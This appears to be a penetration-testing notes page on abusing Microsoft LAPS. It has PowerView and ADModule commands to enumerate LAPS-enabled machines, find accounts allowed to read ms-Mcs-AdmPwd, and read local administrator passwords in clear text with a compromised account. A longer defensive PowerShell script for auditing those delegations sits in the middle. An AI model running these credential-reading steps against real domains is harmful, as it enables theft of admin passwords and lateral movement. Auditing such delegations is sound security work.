<aside> ⚠️ To abuse LAPS it is necessary to compromise a user who has the privilege to read LAPS passwords in clear text, so you must first enumerate which users are allowed to read a particular password.

</aside>

The misconfiguration is on the part of the administrators when they grant too many users access to read the credentials in clear text.

Enumerate computers with LAPS GPO Enabled (PowerView):

Get-DomainComputer | ? { $_."ms-Mcs-AdmPwdExpirationTime" -ne $null } | select dnsHostName

Enumerate computers with LAPS GPO Enabled (ADModule):

Get-ADComputer -Filter {ms-Mcs-AdmPwdExpirationTime -like "*"} -Properties ms-Mcs-AdmPwdExpirationTime | select Name,DistinguishedName

Enumerate users who can read the clear-text passwords of the machines in the OUs:

Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" } | select ObjectDn, SecurityIdentifier

The following command also returns the IdentityName in a readable format:

Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object { ($_.ObjectAceType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty') } | ForEach-Object { $_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier); $_ }
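The same delegation check from the administrator's side, as an added audit script that is not part of the original page: it resolves the schema GUID of ms-Mcs-AdmPwd, walks every OU's ACL with the RSAT ActiveDirectory module, and reports every principal that can read the attribute but is not in an expected list. The `$expected` list is an assumption to adjust for your domain.

```powershell
# Added audit example (not from the original page). Lists every ACE on the domain's OUs
# that grants read access to the LAPS attribute ms-Mcs-AdmPwd, so over-broad delegations
# can be reviewed. Assumes the RSAT ActiveDirectory module on a domain-joined host.
Import-Module ActiveDirectory

# The schemaIDGUID of ms-Mcs-AdmPwd differs per forest, so resolve it from the schema.
$schemaNC   = (Get-ADRootDSE).schemaNamingContext
$admPwdAttr = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(name=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
if (-not $admPwdAttr) { throw 'ms-Mcs-AdmPwd not found in the schema; the LAPS schema extension is not installed.' }
$admPwdGuid = [guid]$admPwdAttr.schemaIDGUID

# Principals expected to hold the right (assumption: edit for your environment).
# Everything else that can read the attribute is reported.
$expected = @('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM', "$env:USERDOMAIN\Domain Admins")

$findings = foreach ($ou in Get-ADOrganizationalUnit -Filter *) {
    $acl = Get-Acl -Path ("AD:\" + $ou.DistinguishedName)
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # ms-Mcs-AdmPwd is a confidential attribute: reading it needs the control-access
        # right on the attribute itself, or "all extended rights" / GenericAll on the object.
        $readsAdmPwd = if ($ace.ObjectType -eq $admPwdGuid) {
            $ace.ActiveDirectoryRights -match 'ReadProperty|ExtendedRight'
        } else {
            ($ace.ObjectType -eq [guid]::Empty) -and
            ($ace.ActiveDirectoryRights -match 'ExtendedRight|GenericAll')
        }
        if ($readsAdmPwd) {
            [pscustomobject]@{
                OU        = $ou.DistinguishedName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.ActiveDirectoryRights
                Inherited = $ace.IsInherited
                Expected  = $expected -contains $ace.IdentityReference.Value
            }
        }
    }
}

# Rows with Expected = False are delegations to review: that principal can read local admin passwords.
$findings | Where-Object { -not $_.Expected } | Sort-Object OU, Principal | Format-Table -AutoSize
```

Inherited ACEs are included on purpose, because a delegation set high in the OU tree is the usual way the right ends up on far more computers than intended.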

Once we have compromised a user who holds these rights, use the following to read the clear-text passwords (in the security context of the privileged user):

PowerView:

Get-DomainObject -Identity "<targetmachine$>" | select -ExpandProperty "ms-mcs-admpwd"

ADModule:

Get-ADComputer -Identity "<targetmachine$>" -Properties "ms-mcs-admpwd" | select -ExpandProperty "ms-mcs-admpwd"